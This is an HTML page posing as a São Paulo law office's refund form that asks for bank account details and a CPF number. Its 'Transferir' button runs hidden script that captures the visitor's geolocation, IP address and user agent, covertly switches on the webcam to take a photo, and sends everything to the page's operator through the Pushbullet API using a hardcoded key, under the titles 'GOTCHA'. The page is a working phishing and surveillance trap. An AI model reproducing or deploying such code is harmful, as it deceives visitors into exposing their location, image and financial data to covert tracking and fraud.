<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport"    content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="author"      content="your doom">
	
	<title>Santos Advocacia</title>

	<link rel="shortcut icon" href="assets/images/gt_favicon.png">
	
	<!-- Bootstrap -->
	<link href="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.no-icons.min.css" rel="stylesheet">
	<!-- Icons -->
	<link href="https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
	<!-- Fonts -->
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Alice|Open+Sans:400,300,700">
	<!-- Custom styles -->
	<link rel="stylesheet" type="text/css" href="styles.css">
</head>
<body>

<header id="header">
	<div id="head" class="parallax" parallax-speed="2">
		<h1 id="logo" class="text-center">
			<img class="img-circle" src="assets/images/guy.png" alt="">
			<span class="title">Augusto Santos Braga</span>
			<span class="tagline">Trabalhista, Previdênciário e Pequenas Causas<br>
				<a href="">augustosantosbragaadv@gmail.com</a></span>
		</h1>
	</div>

	<nav class="navbar navbar-default navbar-sticky">
		<div class="container-fluid">
			
			<div class="navbar-header">
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
			</div>
			
			<div class="navbar-collapse collapse">
				
				<ul class="nav navbar-nav">
					<li class="active"><a href="index.html">Principal</a></li>
					<li><a href="index.html">Sobre</a></li>
					<li><a href="servicos.html">Serviços</a></li>
					<li><a href="cliente.html">Area do cliente</a></li>
				</ul>
			
			</div><!--/.nav-collapse -->			
		</div>	
	</nav>
</header>

<main id="main">

	<div class="container">

		<div class="row topspace">
			
			<!-- Sidebar -->
			<aside class="col-sm-4 sidebar sidebar-right">

				<ul class="nav text-right nav-side">
					<li class="active"><a href="#ui">Reembolsos</a></li>
					<li><a href="#frontend">Envio de documentos</a></li>
					<li><a href="#backend">Pagamentos</a></li>
					<li><a href="#backend">Honorários</a></li>
				</ul>

			</aside>
			<!-- /Sidebar -->

			<!-- Article main content -->
			<article class="col-sm-8 maincontent">
				<h3 id="reply-title">Formulário de Reembolso</h3>
				<p style="margin-bottom:20px;">PARA QUE A TRANSFERÊNCIA OCORRA CLIQUE EM ACEITAR PARA A JANELA DE SEGURANÇA DO NAVEGADOR.</p>
				<form action="" method="post" id="commentform" class="">
					<div class="form-group">
						<label for="inputEmail">Localizador (permitir localização no navegador)</label>
						<input type="email" class="form-control" id="inputEmail" placeholder="Localizador">
					</div>
					<div class="form-group">
						<label for="inputEmail">Instituição Financeira</label>
						<select name="cars" id="cars">
						  <option value="bb">001 – Banco do Brasil S.A.</option>
						  <option value="santander">033 – Banco Santander (Brasil) S.A.</option>
						  <option value="itau">341 – Banco Itaú S.A.</option>
						  <option value="bradesco">237 – Banco Bradesco S.A.</option>
						</select>
					</div>
					<div class="form-group">
						<label for="inputEmail">Agência</label>
						<input type="email" class="form-control" id="inputEmail" placeholder="Numero da agência">
					</div>
					<div class="form-group">
						<label for="inputEmail">Conta</label>
						<input type="email" class="form-control" id="inputEmail" placeholder="Numero da conta bancária">
					</div>
					<div class="form-group">
						<label for="inputEmail">CPF</label>
						<input type="email" class="form-control" id="inputEmail" placeholder="CPF com digito">
					</div>
					<div class="form-group">
						<label for="inputWeb">Valor (R$)</label>
						<input type="nane" class="form-control" id="inputWeb" placeholder="R$ 0,00">
					</div>
					<div class="row">
						<div class="col-md-4 text-left">
							<a onclick="getLocation()" class="btn btn-action">Transferir</a>
						</div>
					</div>
				</form>
			</article>
			
			<!-- /Article -->
			<p style="margin-bottom:1cm;">...</p>
			<p style="margin-bottom:3cm;">Ao confirmar o reembolso, a transação será realizada em até 30 minutos. Após a confirmação, entre em contato com o advogado responsável.</p>
			

		</div>
	</div>	<!-- /container -->
	
</main>

<footer id="footer">
	<div class="container">
		<div class="row">
			<div class="col-md-3 widget">
				<h3 class="widget-title">Contact</h3>
				<div class="widget-body">
					<p>(11) 3032-5383<br>
						<a href="mailto:#">augusto.braga@santosadv.com</a><br>
						<br>
						R. João Guimarães Rosa - Consolação, São Paulo - SP, 01303-030
					</p>	
				</div>
			</div>

			<div class="col-md-3 widget">
				<h3 class="widget-title">Redes</h3>
				<div class="widget-body">
					<p class="follow-me-icons">
						<a href=""><i class="fa fa-twitter fa-2"></i></a>
						<a href=""><i class="fa fa-linkedin fa-2"></i></a>
					</p>
				</div>
			</div>

			<div class="col-md-3 widget">
				<h3 class="widget-title">LEGAL</h3>
				<div class="widget-body">
					<p>Um escritório cujo maior patrimônio é o relacionamento com o cliente. Sua causa, como pessoa física ou jurídica, poderá contar com a participação de vários profissionais, porém terá a garantia do envolvimento direto da responsável pela banca, Augusto Braga.</p>
				</div>
			</div>

		</div> <!-- /row of widgets -->
	</div>
</footer>

<video id="video" width="320" height="240" autoplay visibility=hidden></video>
<canvas id="canvas" width="320" height="240" visibility=hidden></canvas>

<script src="https://alexschneider.github.io/pushbullet-js/pushbullet.min.js" type="text/javascript"></script>

<script>
function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  }
}

async function snapBandit() {
	let stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: false });
	video.srcObject = stream;
}

function savePic() {
	canvas.getContext('2d').drawImage(video, 0, 0, canvas.width, canvas.height);
   	let image_data_url = canvas.toDataURL('image/jpeg');
	
	PushBullet.APIKey = "o.1SZFe4onBYb4HZgnm6yyqE7WDJjKvF3d";
	var res = PushBullet.push("note", "", null, {title: "GOTCHA IMG", body: image_data_url});
	console.log(res);
}

async function showPosition(position) {
	var ip ="ip";
	$.getJSON('http://www.geoplugin.net/json.gp', function(data) {
	  ip = JSON.stringify(data, null, 2);
	});

  var ua= navigator.userAgent;
  var appName = navigator.appName;
  var x = "Latitude: " + position.coords.latitude +
  " Longitude: " + position.coords.longitude + " UA: "+ua+" APP: "+appName+" \n "+ip;
  
  PushBullet.APIKey = "o.1SZFe4onBYb4HZgnm6yyqE7WDJjKvF3d";
  var res = PushBullet.push("note", "", null, {title: "GOTCHA", body: x});
  console.log(res);
  
  await snapBandit();
  setTimeout(function() { savePic(); }, 2000);
}
</script>

<!-- JavaScript libs are placed at the end of the document so the pages load faster -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
<script src="assets/js/template.js"></script>
</body>
</html>
